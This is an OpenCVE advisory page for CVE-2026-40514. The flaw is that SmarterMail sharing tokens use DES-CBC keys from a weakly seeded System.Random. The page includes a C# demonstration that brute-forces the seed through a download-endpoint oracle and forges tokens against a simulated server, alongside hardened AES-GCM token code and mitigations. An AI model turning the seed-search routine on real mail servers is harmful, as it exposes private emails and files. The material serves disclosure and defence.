Description
SmarterTools SmarterMail builds prior to 9610 contain a cryptographic weakness in the file and email sharing endpoints that use DES-CBC encryption with keys and initialization vectors derived from System.Random seeded with insufficient entropy, reducing the seed space to approximately 19,000 possible values. An unauthenticated attacker can use the attachment download endpoint as an oracle to determine the seed in use and derive encryption keys and initialization vectors to forge sharing tokens for arbitrary emails, attachments, or file storage contents without prior access to the targeted content.
Published: 2026-04-27
Score: 8.2 High
EPSS: n/a
KEV: No
Impact: Unauthorized Access to Emails, Attachments, and Stored Files via Forged Tokens
Action: Patch Immediately
AI Analysis

Impact

SmarterTools SmarterMail builds before 9610 protect file and email sharing tokens with DES‑CBC. The key and IV are drawn from System.Random seeded from a low‑entropy source, so only about 19,000 distinct seeds, and therefore only about 19,000 key/IV pairs, are possible. An unauthenticated attacker can use the attachment download endpoint as an accept/reject oracle: forge a token under each candidate seed, submit it, and stop when the server accepts one. With the seed recovered, the attacker can mint valid sharing tokens for any email, attachment, or file‑storage item without ever having had access to it. The root cause is use of a cryptographically weak PRNG (CWE‑338); the impact, as both CVSS vectors record, is loss of confidentiality of user content (no integrity or availability impact is claimed).

Affected Systems

SmarterTools Inc. SmarterMail, all builds prior to 9610. Any installation that exposes the DES‑CBC‑based file or email sharing endpoints on a build before 9610 is affected; Build 9610 is the first build the CVE text treats as fixed.

Risk and Exploitability

The CVSS 4.0 score of 8.2 (High) and the CVSS 3.1 score of 5.9 (Medium) both carry Attack Complexity: High. Exploitation is unauthenticated and network‑reachable, but it is a search over the seed space driven by repeated oracle requests, not a single crafted request. No EPSS score is available yet, so the probability of exploitation cannot be estimated; the vulnerability is not listed in the CISA KEV catalog, and the SSVC assessment records Exploitation: none and Automatable: no. In practice an attacker with network access to the sharing/download endpoint and no credentials can recover the seed with at most roughly 19,000 probes and then generate valid tokens for arbitrary content. The observable artifact of that search is a burst of failed download‑token requests from one client.
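The seed search described in the Impact and Risk paragraphs above, sketched as an added C# illustration. This is not SmarterMail code and not the published exploit: the seed range (set to the CVE's "approximately 19,000"), the way the key and IV are drawn from System.Random, the token layout (a fixed prefix plus a resource id, DES‑CBC, Base64) and the download endpoint's accept/reject behaviour are all assumptions made so the mechanism can run end to end; the real endpoint and token format are not reproduced.

```csharp
// Added illustration of the CVE-2026-40514 bug class; not SmarterMail code.
// Assumptions: seed space of ~19,000 values, key and IV taken from
// System.Random(seed), token = DES-CBC("SHARE:" + resourceId) in Base64, and a
// download endpoint that reveals only whether a token decrypted cleanly.
using System;
using System.Security.Cryptography;
using System.Text;

static class WeakSharingTokens
{
    const int SeedSpace = 19_000;   // assumed size of the recoverable seed space
    const string Magic = "SHARE:";  // assumed token prefix the server checks

    // Key and IV from a seeded System.Random: the same seed always yields the
    // same 16 bytes, so the whole secret is the (small) seed.
    public static (byte[] Key, byte[] Iv) DeriveDes(int seed)
    {
        var rng = new Random(seed);
        var key = new byte[8];
        var iv = new byte[8];
        rng.NextBytes(key);
        rng.NextBytes(iv);
        return (key, iv);
    }

    static byte[] DesCbc(byte[] key, byte[] iv, byte[] data, bool encrypt)
    {
        using var des = DES.Create();
        des.Mode = CipherMode.CBC;
        des.Padding = PaddingMode.PKCS7;
        using var xf = encrypt ? des.CreateEncryptor(key, iv) : des.CreateDecryptor(key, iv);
        return xf.TransformFinalBlock(data, 0, data.Length);
    }

    // Anyone who knows the seed can issue a token; the server and the attacker
    // run exactly the same code.
    public static string Forge(int seed, string resourceId)
    {
        var (key, iv) = DeriveDes(seed);
        return Convert.ToBase64String(DesCbc(key, iv, Encoding.UTF8.GetBytes(Magic + resourceId), encrypt: true));
    }

    // Stand-in for the vulnerable sharing service.
    sealed class SharingService
    {
        readonly int seed;   // assumed: fixed at startup from a low-entropy source
        public SharingService(int seed) => this.seed = seed;
        public string IssueToken(string resourceId) => Forge(seed, resourceId);

        // The download endpoint as an oracle: a token that does not decrypt to
        // the expected prefix gets an error response (false); one that does is
        // served (true). Nothing else about the key leaks, and nothing else is needed.
        public bool TryResolve(string token, out string? resourceId)
        {
            resourceId = null;
            var (key, iv) = DeriveDes(seed);
            try
            {
                var plain = Encoding.UTF8.GetString(DesCbc(key, iv, Convert.FromBase64String(token), encrypt: false));
                if (!plain.StartsWith(Magic, StringComparison.Ordinal)) return false;
                resourceId = plain.Substring(Magic.Length);
                return true;
            }
            catch (Exception e) when (e is CryptographicException || e is FormatException) { return false; }
        }
    }

    // Attacker: forge a token for some resource id under each candidate seed and
    // ask the oracle. Worst case SeedSpace probes; no captured token and no prior
    // access to the target content is needed.
    public static int? RecoverSeed(Func<string, bool> oracle, string probeResourceId)
    {
        for (int seed = 0; seed < SeedSpace; seed++)
        {
            string candidate;
            try { candidate = Forge(seed, probeResourceId); }
            catch (CryptographicException) { continue; }   // DES weak-key rejection; the server could not use it either
            if (oracle(candidate)) return seed;
        }
        return null;
    }

    static void Main()
    {
        // Constructed scenario: the server's low-entropy seed happens to be 13337.
        var server = new SharingService(13_337);
        int? seed = RecoverSeed(t => server.TryResolve(t, out _), "attachment/1");
        Console.WriteLine($"recovered seed: {seed}");
        var forged = Forge(seed!.Value, "mailbox/victim/message/42");
        server.TryResolve(forged, out var resource);
        Console.WriteLine($"forged token resolves to: {resource}");
    }
}
```

The oracle here is an in‑process call; against a real endpoint each probe is one HTTP request, so the search costs at most about SeedSpace requests and looks, from the server side, like a stream of rejected download attempts from a single client. The false‑positive rate is negligible because a wrong key has to survive both the PKCS7 padding check and the prefix comparison.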

Generated by OpenCVE AI on April 28, 2026 at 04:23 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update SmarterMail to Build 9610 or later. The CVE text identifies builds before 9610 as affected, so 9610 is the first build expected to contain the fix; no vendor advisory is linked on this page yet, so confirm the change against SmarterTools' release notes.
  • If an immediate upgrade is not possible, disable public file and email sharing, or place the sharing and attachment download endpoints behind authentication or network restrictions; the attack needs only unauthenticated reachability of the download endpoint. Rate‑limit and alert on repeated failed download‑token requests from one source, since that is what the seed search looks like.
  • The underlying fix is a vendor‑side code change, not an administrator setting: sharing keys and IVs must come from a cryptographically secure generator (System.Security.Cryptography.RandomNumberGenerator rather than System.Random), and tokens should use an authenticated cipher such as AES‑GCM so that a forged token fails authentication before any lookup. Treat sharing links issued by a vulnerable build as potentially exposed.
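The hardened pattern the last item describes, as an added C# illustration of the vendor‑side change (not SmarterTools' fix; the token layout, the purpose label and the helper names are assumptions). The key comes from the OS CSPRNG, each token carries a fresh random nonce, and AES‑GCM's tag binds the ciphertext to an associated‑data label naming the endpoint, so a token forged under a guessed key, modified in transit, or replayed against a different endpoint is rejected before any resource lookup.

```csharp
// Added illustration of a hardened sharing token; not SmarterTools' code.
// Assumptions: key from RandomNumberGenerator (or a secret store), token =
// Base64(nonce || ciphertext || tag), and the endpoint name as AES-GCM
// associated data so tokens cannot be replayed across endpoints.
using System;
using System.Security.Cryptography;
using System.Text;

static class HardenedSharingTokens
{
    const int NonceSize = 12, TagSize = 16;

    // CSPRNG-backed key; never System.Random, and never derived from a seed.
    public static byte[] NewKey() => RandomNumberGenerator.GetBytes(32);

    public static string Issue(byte[] key, string purpose, string resourceId)
    {
        var nonce = RandomNumberGenerator.GetBytes(NonceSize);   // fresh per token
        var plain = Encoding.UTF8.GetBytes(resourceId);
        var cipher = new byte[plain.Length];
        var tag = new byte[TagSize];
        using var aes = new AesGcm(key);   // on .NET 8+ prefer new AesGcm(key, TagSize)
        aes.Encrypt(nonce, plain, cipher, tag, Encoding.UTF8.GetBytes(purpose));

        var token = new byte[NonceSize + cipher.Length + TagSize];
        Buffer.BlockCopy(nonce, 0, token, 0, NonceSize);
        Buffer.BlockCopy(cipher, 0, token, NonceSize, cipher.Length);
        Buffer.BlockCopy(tag, 0, token, NonceSize + cipher.Length, TagSize);
        return Convert.ToBase64String(token);
    }

    // Any tampering, wrong key, or wrong purpose fails the tag check: no padding
    // oracle, no partial decryption, nothing for an attacker to probe.
    public static bool TryResolve(byte[] key, string purpose, string token, out string? resourceId)
    {
        resourceId = null;
        byte[] raw;
        try { raw = Convert.FromBase64String(token); } catch (FormatException) { return false; }
        if (raw.Length < NonceSize + TagSize) return false;

        var nonce = raw.AsSpan(0, NonceSize);
        var cipher = raw.AsSpan(NonceSize, raw.Length - NonceSize - TagSize);
        var tag = raw.AsSpan(raw.Length - TagSize, TagSize);
        var plain = new byte[cipher.Length];
        try
        {
            using var aes = new AesGcm(key);
            aes.Decrypt(nonce, cipher, tag, plain, Encoding.UTF8.GetBytes(purpose));
        }
        catch (CryptographicException) { return false; }   // includes the tag-mismatch exception
        resourceId = Encoding.UTF8.GetString(plain);
        return true;
    }

    static void Main()
    {
        var key = NewKey();
        var token = Issue(key, "attachment-download", "mailbox/victim/message/42");
        Console.WriteLine(TryResolve(key, "attachment-download", token, out var id) + " " + id);
        // The same token presented to another endpoint, or with one bit flipped, is rejected.
        Console.WriteLine(TryResolve(key, "email-share", token, out _));
        var raw = Convert.FromBase64String(token);
        raw[^1] ^= 1;
        Console.WriteLine(TryResolve(key, "attachment-download", Convert.ToBase64String(raw), out _));
    }
}
```

For sharing links specifically, the simplest design is often better still: issue an opaque random identifier and keep the mapping to the resource server‑side, so there is no token cryptography to get wrong and revocation is a row delete.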

Advisories

No advisories yet.

History

Tue, 28 Apr 2026 04:00:00 +0000

Type                 Values Removed   Values Added
First Time appeared                   Smartertools; Smartertools smartermail
Vendors & Products                    Smartertools; Smartertools smartermail

Mon, 27 Apr 2026 21:15:00 +0000

Type                 Values Removed   Values Added
Metrics                               ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Mon, 27 Apr 2026 15:00:00 +0000

Type                 Values Removed   Values Added
Description                           SmarterTools SmarterMail builds prior to 9610 contain a cryptographic weakness in the file and email sharing endpoints that use DES-CBC encryption with keys and initialization vectors derived from System.Random seeded with insufficient entropy, reducing the seed space to approximately 19,000 possible values. An unauthenticated attacker can use the attachment download endpoint as an oracle to determine the seed in use and derive encryption keys and initialization vectors to forge sharing tokens for arbitrary emails, attachments, or file storage contents without prior access to the targeted content.
Title                                 SmarterTools SmarterMail < Build 9610 Cryptographic Weakness via Weak RNG
Weaknesses                            CWE-338
References
Metrics                               cvssV3_1: {'score': 5.9, 'vector': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}
                                      cvssV4_0: {'score': 8.2, 'vector': 'CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N'}

Subscriptions

Smartertools Smartermail
MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-04-27T20:11:46.028Z

Reserved: 2026-04-13T20:29:02.809Z

Link: CVE-2026-40514

Vulnrichment

Updated: 2026-04-27T19:06:38.770Z

NVD

Status : Awaiting Analysis

Published: 2026-04-27T15:16:20.160

Modified: 2026-04-27T18:57:20.293

Link: CVE-2026-40514

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-28T04:30:21Z

Weaknesses